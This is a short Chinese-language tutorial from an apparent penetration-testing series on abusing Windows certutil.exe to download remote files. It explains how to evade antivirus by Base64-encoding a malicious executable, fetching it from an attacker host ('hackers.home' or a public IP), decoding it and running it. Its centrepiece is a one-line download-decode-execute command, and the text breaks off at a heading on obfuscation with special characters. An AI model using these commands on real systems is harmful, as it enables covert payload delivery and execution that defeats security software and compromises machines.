内网渗透：九、certutil-远程下载绕过

内网渗透：九、certutil-远程下载绕过

目录

内网渗透：九、certutil-远程下载绕过

一、CertUti

使用语法 :windows

二、certutil绕过*混淆方式

---

一、CertUti

        Certutil.exe 是作为证书服务的一部分安装的命令行程序。您可以使用 Certutil.exe 转储和显示证书颁发机构 (CA) 配置信息、配置证书服务、备份和还原 CA 组件以及验证证书、密钥对和证书链。

当 certutil 在没有附加参数的证书颁发机构上运行时，它会显示当前的证书颁发机构配置。在非认证机构上运行 cerutil 时，该命令默认运行 certutil -dump动词。

使用语法 :windows

 

certutil.exe -urlcache -split -f [URL]output.file

certutil  -urlcache  -split  -f  http://192.168.17.136:8000/1.txt

​

二、certutil绕过*混淆方式

• 使用CertUtil + Base64来绕过安全软件

经过Base64对恶意文件进行编码，使恶意代码样本看起来像是无害的文本文件，而后使用CertUtil.exe下载后对其进行解码。下载了文本文件使用“Certutil.exe -decode”命令将Base64编码文件解码为可执行文件。服务器

C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt 

C:\Temp>certutil.exe -decode bad.txt bad.exe 

 

certutil -urlcache -split -f http://45.77.55.231/update.b64 update.b64＆certutil -decode update.b64 update.exe＆update.exe

• 使用特殊符号（windwos会忽略的）